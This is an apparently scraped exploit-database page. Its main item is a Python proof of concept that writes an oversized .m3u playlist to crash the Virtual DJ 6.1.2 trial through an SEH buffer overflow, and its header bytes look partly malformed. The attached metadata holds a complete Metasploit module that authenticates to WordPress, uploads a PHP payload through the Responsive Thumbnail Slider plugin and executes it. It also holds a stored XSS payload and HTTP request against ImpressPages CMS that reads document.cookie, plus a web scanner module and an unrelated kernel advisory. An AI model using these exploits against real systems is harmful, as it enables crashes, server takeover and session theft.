Search...

Virtual DJ Trail 6.1.2 SEH Buffer Overflow Crash POC

2010-09-06T00:00:00

ID 1337DAY-ID-13990
Type zdt
Reporter Abhishek Lyall
Modified 2010-09-06T00:00:00

Description

Exploit for python platform in category dos / poc

                                        
                                            ====================================================
Virtual DJ Trail 6.1.2 SEH Buffer Overflow Crash POC
====================================================

#Virtual DJ Trail 6.1.2 SEH Buffer Overflow Crash POC
#vulnerble application link http://www.virtualdj.com/download/trial.html
#tested on XP SP2
#author abhishek lyall - abhilyall[at]gmail[dot]com
#web - http://www.aslitsecurity.com/
#blog - http://www.aslitsecurity.blogspot.com/
#!/usr/bin/python

filename = "crash.m3u"


head = (
"\x23\x56\x69\x72\x710\x75\x61\x6C\x1010\x10A\x20\x50\x6C\x61\x79\x6C"   
"\x69\x73\x710\x0D\x0A\x23\x10D\x69\x78\x510\x79\x70\x65\x3D\x53\x6D"
"\x61\x72\x710\x0D\x0A\x109\x3A\x5C"
)


junk = "\x41" * 20000



textfile = open(filename , 'w')
textfile.write(head+junk)
textfile.close()



#  0day.today [2018-04-04]  #

JSON Vulners Source

Initial Source

{"published": "2010-09-06T00:00:00", "id": "1337DAY-ID-13990", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T00:13:50", "bulletin": {"published": "2010-09-06T00:00:00", "id": "1337DAY-ID-13990", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 5.5, "modified": "2016-04-20T00:13:50", "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N/"}}, "hash": "134d58f327de1a25f7239e0c9b4f657fbc482a01d41d57ac29db8930200b8798", "description": "Exploit for python platform in category dos / poc", "type": "zdt", "lastseen": "2016-04-20T00:13:50", "edition": 1, "title": "Virtual DJ Trail 6.1.2 SEH Buffer Overflow Crash POC", "href": "http://0day.today/exploit/description/13990", "modified": "2010-09-06T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/13990", "references": [], "reporter": "Abhishek Lyall", "sourceData": "====================================================\r\nVirtual DJ Trail 6.1.2 SEH Buffer Overflow Crash POC\r\n====================================================\r\n\r\n#Virtual DJ Trail 6.1.2 SEH Buffer Overflow Crash POC\r\n#vulnerble application link http://www.virtualdj.com/download/trial.html\r\n#tested on XP SP2\r\n#author abhishek lyall - abhilyall[at]gmail[dot]com\r\n#web - http://www.aslitsecurity.com/\r\n#blog - http://www.aslitsecurity.blogspot.com/\r\n#!/usr/bin/python\r\n\r\nfilename = \"crash.m3u\"\r\n\r\n\r\nhead = (\r\n\"\\x23\\x56\\x69\\x72\\x710\\x75\\x61\\x6C\\x1010\\x10A\\x20\\x50\\x6C\\x61\\x79\\x6C\" \r\n\"\\x69\\x73\\x710\\x0D\\x0A\\x23\\x10D\\x69\\x78\\x510\\x79\\x70\\x65\\x3D\\x53\\x6D\"\r\n\"\\x61\\x72\\x710\\x0D\\x0A\\x109\\x3A\\x5C\"\r\n)\r\n\r\n\r\njunk = \"\\x41\" * 20000\r\n\r\n\r\n\r\ntextfile = open(filename , 'w')\r\ntextfile.write(head+junk)\r\ntextfile.close()\r\n\r\n\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "caa68f25dc5a528dcf7cfdee07073093", "key": "title"}, {"hash": "dc4c72dcbbdb813f15e937c07818fd8f", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "4e699488a0ef711db89a74b0aae1d6c7", "key": "sourceHref"}, {"hash": "a72783874e43cf6606a4ba9e572ad95d", "key": "href"}, {"hash": "9fcc9e0224f9757d024bcd38599548cf", "key": "description"}, {"hash": "e5daade12a2d94f520d8de347719d2b3", "key": "modified"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "c1f68d056e1805be3b3fe73cfc40f30c", "key": "sourceData"}, {"hash": "e5daade12a2d94f520d8de347719d2b3", "key": "published"}], "objectVersion": "1.0"}}], "description": "Exploit for python platform in category dos / poc", "hash": "6bf9117fe245b571b6b48cad63a49eade844b7c6cf9b31021182008e7ba60ec8", "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2018-04-04T19:33:19"}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/WP_RESPONSIVE_THUMBNAIL_SLIDER_UPLOAD"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:13990"]}], "modified": "2018-04-04T19:33:19"}, "vulnersScore": 0.7}, "type": "zdt", "lastseen": "2018-04-04T19:33:19", "edition": 2, "title": "Virtual DJ Trail 6.1.2 SEH Buffer Overflow Crash POC", "href": "https://0day.today/exploit/description/13990", "modified": "2010-09-06T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "https://0day.today/exploit/13990", "references": [], "reporter": "Abhishek Lyall", "sourceData": "====================================================\r\nVirtual DJ Trail 6.1.2 SEH Buffer Overflow Crash POC\r\n====================================================\r\n\r\n#Virtual DJ Trail 6.1.2 SEH Buffer Overflow Crash POC\r\n#vulnerble application link http://www.virtualdj.com/download/trial.html\r\n#tested on XP SP2\r\n#author abhishek lyall - abhilyall[at]gmail[dot]com\r\n#web - http://www.aslitsecurity.com/\r\n#blog - http://www.aslitsecurity.blogspot.com/\r\n#!/usr/bin/python\r\n\r\nfilename = \"crash.m3u\"\r\n\r\n\r\nhead = (\r\n\"\\x23\\x56\\x69\\x72\\x710\\x75\\x61\\x6C\\x1010\\x10A\\x20\\x50\\x6C\\x61\\x79\\x6C\" \r\n\"\\x69\\x73\\x710\\x0D\\x0A\\x23\\x10D\\x69\\x78\\x510\\x79\\x70\\x65\\x3D\\x53\\x6D\"\r\n\"\\x61\\x72\\x710\\x0D\\x0A\\x109\\x3A\\x5C\"\r\n)\r\n\r\n\r\njunk = \"\\x41\" * 20000\r\n\r\n\r\n\r\ntextfile = open(filename , 'w')\r\ntextfile.write(head+junk)\r\ntextfile.close()\r\n\r\n\n\n# 0day.today [2018-04-04] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "9fcc9e0224f9757d024bcd38599548cf", "key": "description"}, {"hash": "558f04c482d229c00573a3320e27da61", "key": "href"}, {"hash": "e5daade12a2d94f520d8de347719d2b3", "key": "modified"}, {"hash": "e5daade12a2d94f520d8de347719d2b3", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "dc4c72dcbbdb813f15e937c07818fd8f", "key": "reporter"}, {"hash": "a54a9cf528f7ea32210c35e5f98e70c6", "key": "sourceData"}, {"hash": "2c451adc34d337860d8c798fde81fcb8", "key": "sourceHref"}, {"hash": "caa68f25dc5a528dcf7cfdee07073093", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"metasploit": [{"lastseen": "2019-11-01T19:21:29", "bulletinFamily": "exploit", "description": "This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication.\n", "modified": "2018-07-27T04:08:20", "published": "2018-07-25T16:29:47", "id": "MSF:EXPLOIT/MULTI/HTTP/WP_RESPONSIVE_THUMBNAIL_SLIDER_UPLOAD", "href": "", "type": "metasploit", "title": "WordPress Responsive Thumbnail Slider Arbitrary File Upload", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HTTP::Wordpress\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"WordPress Responsive Thumbnail Slider Arbitrary File Upload\",\n 'Description' => %q{\n This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider\n Plugin v1.0 for WordPress post authentication.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Arash Khazaei', # EDB PoC\n 'Shelby Pace' # Metasploit Module\n ],\n 'References' =>\n [\n [ 'EDB', '37998' ]\n ],\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n [ 'Responsive Thumbnail Slider Plugin v1.0', { } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Aug 28 2015\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"Base path for WordPress\", '/' ]),\n OptString.new('WPUSERNAME', [ true, \"WordPress Username to authenticate with\", 'admin' ]),\n OptString.new('WPPASSWORD', [ true, \"WordPress Password to authenticate with\", '' ])\n ])\n end\n\n def check\n # The version regex found in extract_and_check_version does not work for this plugin's\n # readme.txt, so we build a custom one.\n check_code = check_version || check_plugin_path\n if check_code\n return check_code\n else\n return CheckCode::Safe\n end\n end\n\n def check_version\n plugin_uri = normalize_uri(target_uri.path, '/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => plugin_uri\n )\n\n if res && res.body && res.body =~ /Version:([\\d\\.]+)/\n version = Gem::Version.new($1)\n if version <= Gem::Version.new('1.0')\n vprint_status(\"Plugin version found: #{version}\")\n return CheckCode::Appears\n end\n end\n\n nil\n end\n\n def check_plugin_path\n plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => plugin_uri\n )\n\n if res && res.code == 200\n vprint_status('Upload folder for wp-responsive-images-thumbnail-slider detected')\n return CheckCode::Detected\n end\n\n nil\n end\n\n def login\n auth_cookies = wordpress_login(datastore['WPUSERNAME'], datastore['WPPASSWORD'])\n return fail_with(Failure::NoAccess, \"Unable to log into WordPress\") unless auth_cookies\n\n store_valid_credential(user: datastore['WPUSERNAME'], private: datastore['WPPASSWORD'], proof: auth_cookies)\n\n print_good(\"Logged into WordPress with #{datastore['WPUSERNAME']}:#{datastore['WPPASSWORD']}\")\n auth_cookies\n end\n\n def upload_payload(cookies)\n manage_uri = 'wp-admin/admin.php?page=responsive_thumbnail_slider_image_management'\n file_payload = get_write_exec_payload(:unlink_self => true)\n file_name = \"#{rand_text_alpha(5)}.php\"\n\n # attempt to access plugins page\n plugin_res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, manage_uri),\n 'cookie' => cookies\n )\n\n unless plugin_res && plugin_res.body.include?(\"tmpl-uploader-window\")\n fail_with(Failure::NoAccess, \"Unable to reach Responsive Thumbnail Slider Plugin Page\")\n end\n\n data = Rex::MIME::Message.new\n data.add_part(file_payload, 'image/jpeg', nil, \"form-data; name=\\\"image_name\\\"; filename=\\\"#{file_name}\\\"\")\n data.add_part(file_name.split('.')[0], nil, nil, \"form-data; name=\\\"imagetitle\\\"\")\n data.add_part('Save Changes', nil, nil, \"form-data; name=\\\"btnsave\\\"\")\n post_data = data.to_s\n\n # upload the file\n upload_res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, manage_uri, '&action=addedit'),\n 'cookie' => cookies,\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n )\n\n page = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies)\n fail_with(Failure::Unknown, \"Unsure of successful upload\") unless (upload_res && page && page.body =~ /New\\s+image\\s+added\\s+successfully/)\n\n retrieve_file(page, cookies)\n end\n\n def retrieve_file(res, cookies)\n fname = res.body.scan(/slider\\/(.*\\.php)/).flatten[0]\n fail_with(Failure::BadConfig, \"Couldn't find file name\") if fname.empty? || fname.nil?\n file_uri = normalize_uri(target_uri.path, \"wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}\")\n\n print_good(\"Successful upload\")\n send_request_cgi(\n 'uri' => file_uri,\n 'method' => 'GET',\n 'cookie' => cookies\n )\n end\n\n def exploit\n unless check == CheckCode::Safe\n auth_cookies = login\n upload_payload(auth_cookies)\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb"}, {"lastseen": "2019-12-02T13:53:54", "bulletinFamily": "exploit", "description": "Generates a GET request to the provided webservers and returns the server header, HTML title attribute and location header (if set). This is useful for rapidly identifying interesting web applications en mass.\n", "modified": "2019-02-16T20:42:12", "published": "2015-05-11T16:29:22", "id": "MSF:AUXILIARY/SCANNER/HTTP/TITLE", "href": "", "type": "metasploit", "title": "HTTP HTML Title Tag Content Grabber", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n # Exploit mixins should be called first\n include Msf::Exploit::Remote::HttpClient\n # Scanner mixin should be near last\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'HTTP HTML Title Tag Content Grabber',\n 'Description' => %q{\n Generates a GET request to the provided webservers and returns the server header,\n HTML title attribute and location header (if set). This is useful for rapidly identifying\n interesting web applications en mass.\n },\n 'Author' => 'Stuart Morgan <stuart.morgan[at]mwrinfosecurity.com>',\n 'License' => MSF_LICENSE,\n )\n\n register_options(\n [\n OptBool.new('STORE_NOTES', [ true, 'Store the captured information in notes. Use \"notes -t http.title\" to view', true ]),\n OptBool.new('SHOW_TITLES', [ true, 'Show the titles on the console as they are grabbed', true ]),\n OptString.new('TARGETURI', [true, 'The base path', '/'])\n ])\n\n deregister_options('VHOST')\n end\n\n def run\n if !datastore['STORE_NOTES'] && !datastore['SHOW_TITLES']\n print_error(\"Notes storage is false and titles are not being shown on the console. There isn't much point in running this module.\")\n else\n super\n end\n end\n\n def run_host(target_host)\n begin\n # Send a normal GET request\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path)\n )\n\n # If no response, quit now\n if res.nil?\n vprint_error(\"[#{target_host}:#{rport}] No response\")\n return\n end\n\n # Retrieve the headers to capture the Location and Server header\n # Note that they are case-insensitive but stored in a hash\n server_header = nil\n location_header = nil\n if !res.headers.nil?\n res.headers.each do |key, val|\n location_header = val if key.downcase == 'location'\n server_header = val if key.downcase == 'server'\n end\n else\n vprint_error(\"[#{target_host}:#{rport}] No HTTP headers\")\n end\n\n # If the body is blank, just stop now as there is no chance of a title\n if res.body.nil?\n vprint_error(\"[#{target_host}:#{rport}] No webpage body\")\n return\n end\n\n # Very basic, just match the first title tag we come to. If the match fails,\n # there is no chance that we will have a title\n rx = %r{<title>[\\n\\t\\s]*(?<title>.+?)[\\s\\n\\t]*</title>}im.match(res.body.to_s)\n unless rx\n vprint_error(\"[#{target_host}:#{rport}] No webpage title\")\n return\n end\n\n # Last bit of logic to capture the title\n rx[:title].strip!\n if rx[:title] != ''\n rx_title = Rex::Text.html_decode(rx[:title])\n if datastore['SHOW_TITLES']\n print_good(\"[#{target_host}:#{rport}] [C:#{res.code}] [R:#{location_header}] [S:#{server_header}] #{rx_title}\")\n end\n if datastore['STORE_NOTES']\n notedata = { code: res.code, port: rport, server: server_header, title: rx_title, redirect: location_header, uri: datastore['TARGETURI'] }\n report_note(host: target_host, port: rport, type: \"http.title\", data: notedata, update: :unique_data)\n end\n else\n vprint_error(\"[#{target_host}:#{rport}] No webpage title\")\n end\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\n rescue ::Timeout::Error, ::Errno::EPIPE\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/title.rb"}], "zdt": [{"lastseen": "2018-02-02T03:05:03", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2013-11-24T00:00:00", "published": "2013-11-24T00:00:00", "id": "1337DAY-ID-21563", "href": "https://0day.today/exploit/description/21563", "type": "zdt", "title": "ImpressPages CMS 3.8 - Stored XSS Vulnerability", "sourceData": "steps:\r\n \r\n1) log into the admin panel\r\nhttp://127.0.0.1/cms/ImpressPages/?cms_action=manage\r\n \r\n2)click on advanced tab >> in the button title field enter the payload\r\n\"><img src=x onerror=prompt(document.cookie);>\r\n \r\n \r\nrequest:\r\n \r\nPOST /cms/ImpressPages/?cms_action=manage HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101\r\nFirefox/14.0.1\r\nAccept: application/json, text/javascript, */*; q=0.01\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nProxy-Connection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nReferer: http://127.0.0.1/cms/ImpressPages/?cms_action=manage\r\nContent-Length: 538\r\nCookie: ses11565=2v920trpg7sl8aghg3aj297su5\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n \r\ng=standard&m=content_management&a=savePageOptions&securityToken=4496a2385a44fe257b857f04a3240f53&pageOptions%5BbuttonTitle%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt(document.cookie)%3B%3E+&pageOptions%5Bvisible%5D=1&pageOptions%5BcreatedOn%5D=2009-08-08&pageOptions%5BlastModified%5D=2012-01-21&pageOptions%5BpageTitle%5D=Home&pageOptions%5Bkeywords%5D=&pageOptions%5Bdescription%5D=&pageOptions%5Burl%5D=home&pageOptions%5Btype%5D=default&pageOptions%5BredirectURL%5D=&pageOptions%5Brss%5D=0&pageOptions%5Blayout%5D=home.php&revisionId=91\r\n \r\n \r\n3) refresh the page and we can see that the payload gets executed.\r\n \r\n \r\n \r\n \r\n</head>\r\n<body class=\"manage\" >\r\n \r\n<div class=\"theme clearfix\">\r\n <header class=\"clearfix col_12\">\r\n <div class=\"logo ipModuleInlineManagement ipmLogo \"\r\n data-cssclass=''>\r\n <a href=\"http://127.0.0.1/cms/ImpressPages/en/?cms_action=manage\"\r\nstyle=\" \">\r\n xyz.com </a>\r\n</div>\r\n \r\n <div class=\"right\">\r\n <span class=\"currentPage\">\"><img src=x\r\nonerror=prompt(document.cookie);> </span>\r\n <a href=\"#\" class=\"topmenuToggle\"> </a>\r\n <div class=\"topmenu\">\r\n <ul class=\"level1\">\n\n# 0day.today [2018-02-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/21563"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:19", "bulletinFamily": "software", "description": "\r\n----------------------------------------------------------------------\r\n\r\nHardcore Disassembler / Reverse Engineer Wanted!\r\n\r\nWant to work with IDA and BinDiff?\r\nWant to write PoC's and Exploits?\r\n\r\nYour nationality is not important.\r\nWe will get you a work permit, find an apartment, and offer a\r\nrelocation compensation package.\r\n\r\nhttp://secunia.com/hardcore_disassembler_and_reverse_engineer/\r\n\r\n----------------------------------------------------------------------\r\n\r\nTITLE:\r\nLinux Kernel Uncleared HID0[31] Denial of Service\r\n\r\nSECUNIA ADVISORY ID:\r\nSA21563\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/21563/\r\n\r\nCRITICAL:\r\nNot critical\r\n\r\nIMPACT:\r\nDoS\r\n\r\nWHERE:\r\nLocal system\r\n\r\nOPERATING SYSTEM:\r\nLinux Kernel 2.6.x\r\nhttp://secunia.com/product/2719/\r\n\r\nDESCRIPTION:\r\nA vulnerability has been reported in Linux Kernel, which can be\r\nexploited by malicious, local users to cause a DoS (Denial of\r\nService).\r\n\r\nThe vulnerability is caused due to an error on PPC970 when the\r\nsupport processor attention enable bit (HID0[31]) is set.\r\n\r\nSuccessful exploitation causes the system to stop responding.\r\n\r\nSOLUTION:\r\nUpdate to version 2.6.17.9.\r\nhttp://kernel.org/\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nReported by the vendor.\r\n\r\nORIGINAL ADVISORY:\r\nKernel.org:\r\nhttp://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.17.9\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2006-08-21T00:00:00", "published": "2006-08-21T00:00:00", "id": "SECURITYVULNS:DOC:13990", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13990", "title": "[SA21563] Linux Kernel Uncleared HID0[31] Denial of Service", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:21", "bulletinFamily": "software", "description": "DoS with SG driver, HID0[31] bit clearing problem on PPC970 processors.", "modified": "2006-08-21T00:00:00", "published": "2006-08-21T00:00:00", "id": "SECURITYVULNS:VULN:6524", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:6524", "title": "Multiple Linux kernel DoS condiotions", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}